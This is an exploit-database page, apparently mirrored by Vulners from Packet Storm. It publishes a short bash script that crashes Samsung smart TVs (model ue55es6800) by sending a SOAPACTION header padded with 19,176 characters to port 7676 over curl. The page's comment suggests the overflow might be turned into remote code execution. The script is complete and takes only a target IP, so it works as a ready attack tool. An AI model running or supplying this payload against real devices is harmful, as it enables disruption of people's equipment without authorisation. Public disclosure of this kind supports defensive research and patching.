Lucene search
+L

Samsung TV Denial Of Service

🗓️ 06 Mar 2013 00:00:00Reported by AKAT-1Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Samsung TV Denial Of Service via SOAPACTION overflo

Code
`#!/bin/bash  
  
#####################################################  
# Samsung TV DoS (possible overflow) via SOAPACTION #  
#####################################################  
#  
# Authors:  
#  
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466  
# c8e74ebd8392fda4788179f9a02bb49337638e7b  
# AKAT-1  
#  
#######################################  
  
# Verified for ue55es6800. Nope, it's different than http://www.exploit-db.com/exploits/18751/.  
# (have_telnet) ? RCE : "vuln is DoS if not clever enough to exploit" - Spender.  
  
TARGET=$1  
  
if [ -z $TARGET ]; then  
echo $0 "target_ip"  
exit  
fi  
  
P=`perl -e 'print "A"x19176'`  
  
curl -vvv -o - -d "none" -H "Content-Type: text/xml; charset=\"utf-8\"" -H "SOAPACTION: \"urn:schemas-upnp-org:service:AVTransport:1#SetAVTransport$P\"" http://$TARGET:7676/smp_22_  
  
# EOF  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Mar 2013 00:00Current
0.1Low risk
Vulners AI Score0.1
17